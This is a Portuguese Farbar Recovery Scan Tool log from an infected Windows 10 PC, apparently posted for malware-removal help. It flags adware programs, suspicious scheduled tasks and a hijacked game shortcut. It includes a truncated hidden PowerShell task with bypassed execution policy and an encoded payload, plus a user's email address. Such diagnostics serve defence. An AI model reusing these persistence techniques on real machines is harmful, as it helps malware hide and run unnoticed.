Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:05-03-2016 01
Executado por David (2016-04-03 15:04:49)
Executando a partir de C:\Users\David\Desktop
Windows 10 Pro Versão 1511 (X64) (2015-11-27 22:56:42)
Modo da Inicialização: Normal
==========================================================

==================== Contas: =============================

Administrador (S-1-5-21-3348681765-1422920454-2627347377-500 - Administrator - Disabled)
Convidado (S-1-5-21-3348681765-1422920454-2627347377-501 - Limited - Disabled)
David (S-1-5-21-3348681765-1422920454-2627347377-1001 - Administrator - Enabled) => C:\Users\David
DefaultAccount (S-1-5-21-3348681765-1422920454-2627347377-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3348681765-1422920454-2627347377-1003 - Limited - Enabled)
migue_000 (S-1-5-21-3348681765-1422920454-2627347377-1004 - Administrator - Enabled) => C:\Users\migue_000

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Baidu Antivirus (Enabled - Up to date) {0B023102-4312-4570-585A-1BAAA3570E16}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Baidu Antivirus (Enabled - Up to date) {B063D0E6-6528-4AFE-62EA-20D8D8D044AB}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-3348681765-1422920454-2627347377-1001\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Atualizações da NVIDIA 2.4.3.22 (Version: 2.4.3.22 - NVIDIA Corporation) Hidden
Baidu Antivirus (HKLM-x32\...\Baidu Antivirus) (Version: 5.4.3.147185 - Baidu, Inc.)
Baidu Browser (HKLM-x32\...\Spark) (Version: 40.16 Preview - Baidu Inc.)
Blender (HKLM\...\Blender) (Version: 2.69 - Blender Foundation)
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ATENÇÃO
CCleaner (HKLM\...\CCleaner) (Version: 4.10 - Piriform)
Cities: Skylines (HKLM\...\Steam App 255710) (Version: - Colossal Order Ltd.)
Counter-Strike 1.6 (HKLM-x32\...\Counter-Strike 1.6) (Version: - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 5.0.1.0406 - Disc Soft Ltd)
DVDStyler v2.9.3 (HKLM-x32\...\DVDStyler_is1) (Version: - )
Epic Games Launcher (HKLM-x32\...\{9002F83C-DA49-411E-9CF0-111CB3979F9C}) (Version: 1.1.50.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Firewatch (HKLM-x32\...\Firewatch_is1) (Version: - )
FormatFactory 3.7.0.0 (HKLM-x32\...\FormatFactory) (Version: 3.7.0.0 - Format Factory)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\{579BA58C-F33D-4970-9953-B94B43768AC3}) (Version: 1.00.0000 - Rockstar Games)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
GTA IV em Português BR (HKLM-x32\...\GTA IV em Português BR1.0) (Version: 1.0 - Afrânio Bezerra de Souza)
GTA IV Vehicle Mod Installer v1.3 (HKLM-x32\...\GTA IV Vehicle Mod Installer v1.3_is1) (Version: - MobileD2)
Half-Life (HKLM-x32\...\Half-Life_is1) (Version: Half-Life - Non Steam - KingSOFT DVD)
Intel Driver Update Utility (HKLM-x32\...\{fe92d390-13ee-4660-a2f8-39a066fdffe0}) (Version: 2.2.0.5 - Intel)
Intel(R) Driver Update Utility 2.2.0.5 (x32 Version: 2.2.0.1 - Intel) Hidden
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
Kingo ROOT version 1.4.3.2539 (HKLM-x32\...\{AE7675D6-0B31-494F-ABFA-822E1A0FDF17}_is1) (Version: 1.4.3.2539 - Kingosoft Technology Ltd.)
L.A. Noire (HKLM\...\Steam App 110800) (Version: - Team Bondi)
Launcher Prerequisites (x64) (x32 Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Max Payne 3 (HKLM\...\Steam App 204100) (Version: - Rockstar Studios)
Max Remote versão 2.3 (HKLM-x32\...\{996228C5-A910-42C1-80E3-1E47CEDF7E18}_is1) (Version: 2.3 - Bit Units Studio)
MEGAsync (HKLM-x32\...\MEGAsync) (Version: - Mega Limited)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{070C55FA-FB9D-46DD-B30B-4B520A83A66A}) (Version: 1.20.146.0 - Microsoft)
Minecraft Story Mode Episode 3 (HKLM-x32\...\Minecraft Story Mode Episode 3_is1) (Version: - )
Minecraft Story Mode Episode 2 (HKLM-x32\...\Minecraft Story Mode Episode 2_is1) (Version: - )
Minecraft: Story Mode - A Telltale Games Series (HKLM\...\bWluZWNyYWZ0c3Rvcnltb2RlYXRlbGx0YWxlZ2FtZXNzZXJpZXM_is1) (Version: 1 - )
Minecraft: Story Mode - A Telltale Games Series (HKLM\...\TWluZWNyYWZ0U3RvcnlNb2RlQVRlbGx0YWxlR2FtZXNTZXJpZXM=_is1) (Version: 1 - )
MTA:SA v1.5.2 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.2 - Multi Theft Auto)
NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst (HKLM-x32\...\NARUTO SHIPPUDEN: Ultimate Ninja STORM 3 Full Burst_is1) (Version: - Namco Bandai Games)
NARUTO SHIPPUDEN: Ultimate Ninja STORM 4 (HKLM-x32\...\Steam App 349040) (Version: - CyberConnect2 Co. Ltd.)
Need for Speed Underground 2 (HKLM-x32\...\{909F8EBC-EC7F-48FF-0085-475D818F0F31}) (Version: - )
NVIDIA Driver de áudio HD 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA Driver de controle do 3D Vision 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA Driver de gráficos 353.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 353.54 - NVIDIA Corporation)
NVIDIA Driver do 3D Vision 353.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 353.54 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.3.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.3.22 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.15.0324 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0324 - NVIDIA Corporation)
OpenIV (HKU\S-1-5-21-3348681765-1422920454-2627347377-1001\...\OpenIV) (Version: 2.7.680 - .black/OpenIV Team)
Painel de controle da NVIDIA 353.54 (Version: 353.54 - NVIDIA Corporation) Hidden
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: - )
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2-r5875) (Version: - )
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
PS3 Media Server (HKLM-x32\...\PS3 Media Server) (Version: 1.90.1 - PS3 Media Server)
Remote Desktop Access (VuuPC) (HKLM-x32\...\VOPackage) (Version: - CMI Limited) <==== ATENÇÃO
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.7.2 - Rockstar Games)
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.3.16011.2 - Samsung Electronics Co., Ltd.)
Samsung Kies (x32 Version: 2.6.3.16011.2 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.15.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Comma (HKLM-x32\...\SoftwareUpdater) (Version: 1.0.0.0 - Satellite Comma) <==== ATENÇÃO
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.3.22 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{D87EE6DC-32BA-4219-AC75-0A6FD54ED058}) (Version: 16.0.19912 - Trimble Navigation Limited)
Software de dispositivo do Chipset Intel® (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.29 - Piriform)
Sprite Lamp Demo (HKLM-x32\...\Steam App 318820) (Version: - Snake Hill Games)
SpriteIlluminator (HKLM\...\{63DA7C2B-6FD4-4140-BA80-A8E2B2675DC5}) (Version: 1.2.2 - code-and-web.de)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sunset Riders (HKLM-x32\...\Sunset Riders_is1) (Version: - GameFabrique)
Super Mario Bros. X (HKLM-x32\...\Super Mario Bros. X) (Version: - )
The Walking Dead (HKLM-x32\...\Steam App 207610) (Version: - )
The Walking Dead: Season Two (HKLM-x32\...\Steam App 261030) (Version: - Telltale Games)
Tools Update Platform (HKLM-x32\...\{6A128791-4857-4484-9BB2-71D4C1257200}) (Version: 5.0.0.61 - Beijing Zhihuimen Techology co,.Ltd) <==== ATENÇÃO
Toolwiz Care (HKLM-x32\...\ToolwizCareFree) (Version: 3.1.0.5000 - ToolWiz Care)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Xander - Files 1.00 (HKLM-x32\...\Xander - Files 1.00) (Version: - )

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-3348681765-1422920454-2627347377-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\David\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3348681765-1422920454-2627347377-1001_Classes\CLSID\{D45F043D-F17F-4e8a-8435-70971D9FA46D}\InprocServer32 -> C:\Program Files (x86)\Blender Foundation\Blender\BlendThumb64.dll ()

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {00EFB637-03DE-43A8-94D3-4030D0433886} - System32\Tasks\DNSPEACHBURG => dnspeachburg.exe <==== ATENÇÃO
Task: {0F1F8A04-8387-4482-90B6-030DF52032E5} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Duplicaterecord.js" <==== ATENÇÃO
Task: {1403B665-624A-4372-B6E1-9637D1CD3B6F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {166BA55F-9F8E-409F-9EEC-F6AF32625ED4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {24E12B06-C447-47E6-AE68-920DB0DD1C7D} - System32\Tasks\SparkUpdater => C:\Program Files (x86)\baidu\Baidu Browser\SparkUpdate.exe [2016-03-04] (Baidu.com, Inc.)
Task: {2A424AF1-4CCC-4A9E-80F7-693FDFE4ED63} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {2B0D7ACC-7BBC-4278-B4A4-65A56939823B} - System32\Tasks\{79790447-7D0F-0A08-0C11-7D0D7A7E117F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (a entrada de dados tem 9280 mais caracteres).
Task: {3544628D-693D-4141-A7B5-994353A0498C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-13] (Google Inc.)
Task: {3B96A041-0DDB-471F-A477-8AF9E4C5CE04} - System32\Tasks\ToolsUpdatePlatform_ScheduledTask => C:\Program Files (x86)\ToolsUpdatePlatform\UpdatePlatform.exe <==== ATENÇÃO
Task: {5442E088-C191-42D7-BA5E-41D1EA5642E4} - System32\Tasks\Tegtigmh => C:\PROGRA~1\SHOPPE~1\Laqmusxu.bat
Task: {594EC3C1-E3CD-464F-89C5-C1639112CCE7} - System32\Tasks\{180AEC9F-C978-4740-B45E-4B4BC72D5A93} => pcalua.exe -a C:\Users\David\Desktop\toolwiz-care-3-1-0-5300-es-en-br-fr-de-it-cn-jp-ar-ru-pl-gr-kr-se-win.exe -d C:\Users\David\Desktop
Task: {5A54E578-238E-4DC1-B31F-5517FBE402F7} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Nenhum Arquivo <==== ATENÇÃO
Task: {64E8DEF2-6BB9-402F-8F3D-EC6493344253} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {6A713C69-CD64-4E4B-8542-6B130D940B1C} - System32\Tasks\Lunfur => C:\PROGRA~1\Momthen\Roecgom.bat
Task: {76378DD5-7AF9-4552-B986-AB47FD1FFEE9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-13] (Google Inc.)
Task: {7647EBFB-7BD9-4DD6-934C-66702154CEDD} - System32\Tasks\Baidu Antivirus Update => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\BavUpdater.exe [2015-10-23] (Baidu, Inc.)
Task: {7770631E-46AD-4DBD-807E-D3F943B25334} - System32\Tasks\kze3024 => C:\Program Files (x86)\Hoistsearch\kze3024.exe <==== ATENÇÃO
Task: {7CD91555-047A-49D9-AEE3-5B7133B434E7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {7E28388B-EB1E-4BFB-AC27-7EB40F2762D4} - System32\Tasks\USER_ESRV_SVC_WILLAMETTE => Wscript.exe //B //NoLogo "C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\task.vbs"
Task: {86EB45A8-8E96-4AF5-9D08-7786C484BAA8} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {899283C1-4DE7-46F3-9D4B-BC9DA26E0820} - System32\Tasks\ttwifi => C:\Program Files (x86)\ttwifi\tiantianwifi.exe
Task: {921A4523-2466-49A5-B755-53301BF2B184} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-davipassos2012@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {9335495C-9CC7-4A86-B03E-8507F909BC9E} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe
Task: {A5D3C09B-5EEA-464E-8002-03777D49BBE3} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {A841E4FE-1439-4346-9F37-F97858A6757E} - System32\Tasks\{110A5FD8-79B9-40CF-959F-3A991F668EAD} => pcalua.exe -a C:\Users\David\Desktop\Xbox360_64Ptb.exe -d C:\Users\David\Desktop
Task: {AD210E43-65B3-49A1-961F-50B61AE51E9B} - System32\Tasks\{DFB5A549-525C-4D5F-A279-0D88614A70DF} => pcalua.exe -a "C:\Program Files (x86)\PC Faster\Uninstall.exe"
Task: {BB96C590-D053-4465-ABD4-1221BB78AAA1} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {D369611B-87F5-4A28-8A00-DF9FC5F2BE4C} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {D4449921-8F37-4738-9FC8-BA5CBAE5C294} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-03-31] ()
Task: {E1E17AAF-284D-45E6-A371-248093FDAB45} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {E5649ED9-AE27-4375-891D-B02EE89AD65B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-01-21] (Piriform Ltd)
Task: {EC7B9B19-5529-40B1-844C-E1761E0E1FC1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {EF8D9A00-A17E-4B52-9CD4-AB137714D588} - System32\Tasks\DNS Monitoring => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {FA16FDA1-678A-41D9-B669-3FB2EDF5887B} - System32\Tasks\{B30AE3A6-3FFD-4CAD-8291-7788A1362499} => pcalua.exe -a "C:\Users\David\Documents\MEGAsync Downloads\Xbox360_64Ptb.exe" -d "C:\Users\David\Documents\MEGAsync Downloads"
Task: {FB7182B6-2969-4BB9-82FE-032F3EA05FEC} - System32\Tasks\ToolwizCareFree => C:\Program Files (x86)\ToolwizCareFree\ToolwizCares.exe [2016-01-22] (Toolwiz)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\ToolsUpdatePlatform_ScheduledTask.job => C:\Program Files (x86)\ToolsUpdatePlatform\UpdatePlatform.exe <==== ATENÇÃO

==================== Atalhos =============================

(As entradas podem ser listadas para serem restauradas ou removidas.)

ShortcutWithArgument: C:\Users\David\AppData\Local\Microsoft\Windows\FileHistory\Data\981\C\Users\David\Desktop\Jogos\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst.lnk -> C:\Program Files (x86)\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst\NS3FB_launcher.exe () -> hxxp://www.omniboxes.com/?type=sc&ts=1453004958&z=b4dc208553b81345bd8b0aag9zewdc9e1eez4t4w5b&from=amt&uid=samsungxhd250hj_s0urj9cpc27728

==================== Módulos Carregados (Whitelisted) ==============

2016-04-02 01:55 - 2016-04-02 01:55 - 03587000 _____ () C:\ProgramData\System32\SafeGuard64.dll
2015-10-31 12:46 - 2015-09-14 12:01 - 00414360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
2015-10-31 12:46 - 2015-09-14 12:07 - 00709272 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_modeler.dll
2015-10-31 12:46 - 2015-09-14 12:04 - 00130712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_process_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00025752 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_system_power_state_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00059544 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_quality_and_reliability_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00194712 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\acpi_battery_input.dll
2015-10-31 12:46 - 2015-09-14 12:06 - 00159896 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\sema_thermal_input.dll
2015-10-31 12:46 - 2015-09-14 12:06 - 00158360 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\wifi_input.dll
2015-10-31 12:46 - 2015-09-14 12:05 - 00050840 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\devices_use_input.dll
2015-10-31 12:46 - 2015-09-14 12:04 - 00032920 _____ () C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\intel_disktrace_input.dll
2015-10-30 04:18 - 2015-10-30 04:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-03-02 23:15 - 2016-02-23 08:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-02 23:15 - 2016-02-23 08:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-03-02 23:15 - 2015-12-07 01:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 23:16 - 2016-02-23 05:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-03-02 23:16 - 2016-01-04 22:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-03-02 23:15 - 2016-01-04 22:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-03-02 23:15 - 2016-01-16 02:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-03-02 23:16 - 2016-01-16 02:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-02 01:08 - 2016-03-31 16:28 - 02041856 _____ () C:\ProgramData\WindowsMsg\osmsg.exe
2016-01-28 00:01 - 2016-03-04 12:11 - 00983352 _____ () C:\Program Files (x86)\baidu\Baidu Browser\Spark.exe
2015-10-23 22:20 - 2015-10-23 22:20 - 00297968 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\HipsLogger.dll
2015-10-23 22:20 - 2015-10-23 22:20 - 00540656 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\sqlite.dll
2016-04-02 01:55 - 2016-04-02 01:55 - 02771896 _____ () C:\ProgramData\System32\SafeGuard32.dll
2015-10-23 22:20 - 2015-05-27 08:10 - 00198128 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\dark.dll
2015-12-18 10:55 - 2015-12-18 10:55 - 00052224 _____ () C:\Users\David\AppData\Local\MEGAsync\cares.dll
2016-01-19 21:24 - 2016-01-19 21:24 - 00143872 _____ () C:\Users\David\AppData\Local\MEGAsync\libuv.dll
2015-10-23 22:20 - 2015-10-23 22:20 - 00277488 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\Pulgin_Dark_DeleteFileTip.dll
2015-10-23 22:20 - 2015-10-23 22:20 - 01117680 _____ () C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.147185.0\Operation.dll
2016-03-29 17:47 - 2016-03-04 15:51 - 00096768 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\chrome_elf.dll
2016-04-02 01:57 - 2016-03-04 15:51 - 00732160 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\chrome_elf_wk.dll
2016-03-29 17:47 - 2016-03-27 04:58 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-29 17:47 - 2016-03-27 04:58 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libegl.dll
2016-03-29 17:47 - 2016-03-27 04:58 - 17545880 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\PepperFlash\pepflashplayer.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00430904 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdminiopenssl.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 01018168 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdxui.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00219448 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdbrowsertray.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00410936 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdxctrl.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00521016 _____ () C:\Program Files (x86)\baidu\Baidu Browser\xnet.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00276792 _____ () C:\Program Files (x86)\baidu\Baidu Browser\p2squery.dll
2016-01-28 00:01 - 2016-03-04 12:11 - 00321848 _____ () C:\Program Files (x86)\baidu\Baidu Browser\bdaccount.dll
